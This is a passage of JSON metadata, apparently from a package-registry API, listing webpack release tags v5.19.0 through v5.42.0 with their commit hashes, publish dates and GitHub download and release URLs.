api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000